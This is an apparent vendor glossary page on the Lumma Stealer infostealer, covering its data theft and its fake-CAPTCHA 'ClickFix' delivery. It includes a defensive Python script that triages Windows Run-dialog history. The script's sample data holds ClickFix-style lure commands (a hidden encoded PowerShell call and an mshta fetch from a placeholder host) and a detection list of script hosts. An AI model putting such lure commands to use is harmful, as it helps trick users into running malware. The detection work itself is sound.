Lumma Stealer (LummaC2)
Also known as: LummaC2, Lumma, LummaC2 Stealer
Lumma Stealer (LummaC2) is a malware-as-a-service infostealer that steals browser credentials, cookies, cryptocurrency wallets, and 2FA data from Windows systems. It became one of the dominant stealers after the decline of earlier families and is known for rapid, frequent updates.
What is Lumma Stealer?
Lumma Stealer, also tracked as LummaC2, is a malware-as-a-service infostealer of Russian-speaking origin that rose to prominence as older families lost market share. It is sold via tiered subscriptions on underground forums and Telegram, with higher tiers offering more advanced evasion and data-collection features.
LummaC2 is notable for its frequent updates, active developer support, and use of sophisticated techniques to evade detection and analysis.
What data does Lumma steal?
LummaC2 harvests saved passwords, autofill data, and session cookies from major browsers, cryptocurrency wallet data and browser extensions, and files matching configurable patterns. It can also pull system information and, in some versions, restore expired Google session cookies — a capability that drew significant attention because it can re-enable access to accounts after a session would normally have ended.
How does Lumma spread?
Lumma is distributed through fake CAPTCHA / "ClickFix" pages that trick users into running malicious commands, cracked software, malvertising, phishing, and deceptive download pages. The ClickFix social-engineering technique — instructing victims to paste a command into the Windows Run dialog — has been a particularly common delivery method.
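A defender-side triage for the Run-dialog delivery described above, as an added example that is not part of the original page: Windows records Run-dialog commands under the RunMRU registry key, and the code below scores entries exported from it. The script-host list, the signal patterns, and the sample values are assumptions constructed for illustration, not indicators taken from this page.

```python
import re

# Assumption: script hosts and downloaders that ordinary Run-dialog use (opening a
# folder, launching an app) seldom needs. Illustrative list, not from the page.
SCRIPT_HOSTS = {"powershell", "pwsh", "cmd", "mshta", "wscript", "cscript",
                "curl", "msiexec", "rundll32", "regsvr32"}
# Assumption: heuristic signals chosen for this example, each adding one reason.
SIGNALS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_or_encoded": re.compile(r"\s-(w|windowstyle)\s+h|\s-e(nc|ncodedcommand)?\s", re.I),
    "captcha_lure": re.compile(r"robot|captcha|verif|human", re.I),
}
# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "cmd\\1",
    "b": "\\\\fileserver\\human-resources\\1",
    "c": "mshta https://example.invalid/check # Verify you are human\\1",
    "d": "powershell -w hidden -enc PLACEHOLDER # reCAPTCHA ID 0000\\1",
}


def run_dialog_history(values):
    """Yield Run-dialog commands, newest first, from RunMRU value data."""
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is not None:
            # Explorer stores each entry with a trailing "\1" marker.
            yield data[:-2] if data.endswith("\\1") else data


def triage(command):
    """Return (suspicious, reasons) for one Run-dialog command."""
    first = command.strip().split(None, 1)[0].strip('"') if command.strip() else ""
    program = re.sub(r"\.exe$", "", re.split(r"[\\/]", first)[-1].lower())
    reasons = [name for name, rx in SIGNALS.items() if rx.search(command)]
    if len(command) > 100:
        reasons.append("long_command")
    # A bare script host is common (e.g. "cmd"); require at least one more signal.
    return program in SCRIPT_HOSTS and bool(reasons), reasons


def flagged(values):
    """Commands from the history that warrant analyst review."""
    return [c for c in run_dialog_history(values) if triage(c)[0]]
```

A flagged entry is a lead for review rather than proof of infection; correlate it with process-creation and browser telemetry from the same time window.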
Why Lumma matters
LummaC2 has been responsible for a very large share of newly harvested stealer logs. Its scale, frequent updates, and session-restoration features make it a persistent threat to both consumer and enterprise accounts, and its logs are a major input to the credential-theft economy.
VantaPrism tracks LummaC2 as one of its monitored families, ingesting and parsing Lumma logs in near real time. Security teams can attribute exposures to LummaC2 specifically, see infection timelines, and assess whether stolen cookies put their authenticated sessions at risk.
Frequently Asked Questions
What is the difference between Lumma and LummaC2?
Can Lumma restore expired session cookies?
How is Lumma delivered to victims?
Related Terms
Infostealer malware is a category of malicious software designed to silently harvest sensitive data — passwords, sess…
A stealer log is the package of data exfiltrated from a single device by infostealer malware. It typically contains s…
RedLine Stealer is an information-stealing malware (infostealer) sold as malware-as-a-service that harvests saved bro…
Cookie theft is the stealing of browser cookies — especially authenticated session cookies — so attackers can imperso…
Session hijacking is the takeover of an authenticated session by stealing and reusing its session token or cookie. Be…
Malware-as-a-service (MaaS) is a criminal business model in which malware authors rent or sell their software, infras…